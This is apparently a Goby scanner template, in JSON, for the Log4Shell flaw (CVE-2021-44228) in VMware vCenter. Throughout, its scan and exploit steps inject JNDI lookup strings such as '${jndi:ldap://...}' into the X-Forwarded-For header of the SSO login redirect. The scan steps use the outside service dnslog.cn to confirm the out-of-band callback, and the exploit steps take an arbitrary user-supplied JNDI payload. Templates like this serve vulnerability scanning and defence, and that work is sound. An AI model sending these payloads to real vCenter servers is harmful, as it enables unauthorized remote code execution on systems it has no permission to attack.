{ "Name": "VMware vCenter Log4shell CVE-2021-44228 (1)", "Level": "3", "Tags": [ "rce" ], "GobyQuery": "(app=\"VMware-vCenter\" | body=\"vsphere-client/\" | title=\"VMware vSphere\")", "Description": "vsphere-client /websso/SAML2/SSO/地址存在log4j漏洞。", "Product": "VMware vCenter", "Homepage": "https://www.vmware.com/", "Author": "aetkrad", "Impact": "", "Recommendation": "", "References": [ "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" ], "HasExp": true, "ExpParams": [ { "Name": "cmd", "Type": "input", "Value": "${jndi:ldap://dns.log/tea}" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/ui/login", "follow_redirect": false, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "302", "bz": "" } ] }, "SetVariable": [ "vmid|lastheader|regex|(/websso/SAML2/SSO/.*SAMLRequest=)" ] }, { "Request": { "method": "GET", "uri": "http://www.dnslog.cn/getdomain.php", "follow_redirect": false, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "dnstest|lastbody||" ] }, { "Request": { "method": "GET", "uri": "{{{vmid}}}", "follow_redirect": false, "header": { "X-Forwarded-For": "${jndi:ldap://{{{dnstest}}}/tea}" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [] }, "SetVariable": [ "output|lastbody|regex|" ] }, { "Request": { "method": "GET", "uri": "http://www.dnslog.cn/getrecords.php", "follow_redirect": false, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "{{{dnstest}}}", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/ui/login", "follow_redirect": false, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "302", "bz": "" } ] }, "SetVariable": [ "vmid|lastbody|regex|(/websso/SAML2/SSO/.*SAMLRequest=)" ] }, { "Request": { "method": "GET", "uri": "{{{vmid}}}", "follow_redirect": false, "header": { "X-Forwarded-For": "{{{cmd}}}" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "PostTime": "2021-12-28 10:47:22", "GobyVersion": "1.9.320" }